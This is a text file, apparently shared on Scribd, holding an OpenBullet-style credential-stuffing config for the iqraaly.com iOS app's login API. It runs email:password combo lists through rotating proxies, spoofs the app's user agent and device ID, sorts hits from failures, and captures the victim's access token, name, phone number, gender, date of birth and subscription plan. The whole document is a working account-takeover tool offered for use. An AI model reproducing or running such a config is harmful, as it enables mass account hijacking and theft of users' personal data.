0% found this document useful (0 votes)
60 views2 pages

iOS API - Loli

Uploaded by

samirbouhafs42
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
60 views2 pages

iOS API - Loli

Uploaded by

samirbouhafs42
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

[SETTINGS]

{
"Name": "iqraaly.com iOS API",
"SuggestedBots": 100,
"MaxCPM": 0,
"LastModified": "2022-02-23T23:33:32.3832557+04:00",
"AdditionalInfo": "Arabic COmbo - FAST CPM!",
"RequiredPlugins": [],
"Author": "🔥 YASHVIRGAMING#7131 🔥",
"Version": "1.2.2",
"SaveEmptyCaptures": false,
"ContinueOnCustom": false,
"SaveHitsToTextFile": false,
"IgnoreResponseErrors": false,
"MaxRedirects": 8,
"NeedsProxies": true,
"OnlySocks": false,
"OnlySsl": false,
"MaxProxyUses": 0,
"BanProxyAfterGoodStatus": false,
"BanLoopEvasionOverride": -1,
"EncodeData": false,
"AllowedWordlist1": "MailPass",
"AllowedWordlist2": "",
"DataRules": [],
"CustomInputs": [],
"ForceHeadless": false,
"AlwaysOpen": false,
"AlwaysQuit": false,
"QuitOnBanRetry": false,
"DisableNotifications": false,
"CustomUserAgent": "",
"RandomUA": false,
"CustomCMDArgs": ""
}

[SCRIPT]
#LOGIN REQUEST POST "https://mobile.iqraaly.com/api/listener/login"
CONTENT "device_identifier=AF30A96C-0D6D-4D6D-B616-
F4DBCADFB29D&device_information=%7B
%7D&password=<PASS>&platform=ios&unique_device_id=AF30A96C-0D6D-4D6D-B616-
F4DBCADFB29D&username=<USER>"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "Host: mobile.iqraaly.com"
HEADER "Accept: */*"
HEADER "Content-Type: application/x-www-form-urlencoded; charset=utf-8"
HEADER "Accept-Encoding: gzip, deflate"
HEADER "User-Agent: Iqraali/4.0.0 (com.innovolve.iqraaly; build:2; iOS 15.3.0)
Alamofire/4.7.3"
HEADER "Accept-Language: en-CA;q=1.0"
HEADER "Content-Length: 200"

KEYCHECK
KEYCHAIN Failure OR
KEY "\"code\":3"
KEY "Invalid username or password."
KEYCHAIN Success OR
KEY "\"message\":\"Success."
KEY "\"access_token\":\""
KEY "\"code\":0"

#TK PARSE "<SOURCE>" JSON "access_token" -> VAR "TK"

#userid PARSE "<SOURCE>" JSON "userid" -> VAR "userid"

#Username PARSE "<SOURCE>" JSON "username" CreateEmpty=FALSE -> CAP "Username"

#Firstname PARSE "<SOURCE>" JSON "first_name" CreateEmpty=FALSE -> CAP "FirstName"

#LastName PARSE "<SOURCE>" JSON "last_name" CreateEmpty=FALSE -> CAP "LastName"

#Phone PARSE "<SOURCE>" JSON "mobile" CreateEmpty=FALSE -> CAP "Phone"

#Gender PARSE "<SOURCE>" JSON "gender" CreateEmpty=FALSE -> CAP "Gender"

#DOB PARSE "<SOURCE>" LR "\"birth_date\":\"" "\"}}" CreateEmpty=FALSE -> CAP "DOB"

#GET_SUBSCRIPTION REQUEST GET "https://app.iqraaly.com/api/user/subscriptions"

HEADER "Host: app.iqraaly.com"


HEADER "App-Type: ios"
HEADER "Accept: */*"
HEADER "Device-Uniqid: AF30A96C-0D6D-4D6D-B616-F4DBCADFB29D"
HEADER "Local-Country: CA"
HEADER "Authorization: Bearer <TK>"
HEADER "App-Version: 4.0.0"
HEADER "Accept-Language: en-CA;q=1.0"
HEADER "Accept-Encoding: gzip, deflate"
HEADER "Access-Token: <TK>"
HEADER "User-Agent: Iqraali/4.0.0 (com.innovolve.iqraaly; build:2; iOS 15.3.0)
Alamofire/4.7.3"
HEADER "Connection: close"

#AUTHOR FUNCTION Constant "🔥 YASHVIRGAMING#7131 🔥" -> CAP "Config By "

KEYCHECK BanOnToCheck=FALSE
KEYCHAIN Success OR
KEY "\"data\":[{\""
KEYCHAIN Custom "FREE" OR
KEY "\"data\":[]}"

#Plan PARSE "<SOURCE>" LR "\"data\":[{\"" "\"]}" Recursive=TRUE CreateEmpty=FALSE -


> CAP "Plan"

You might also like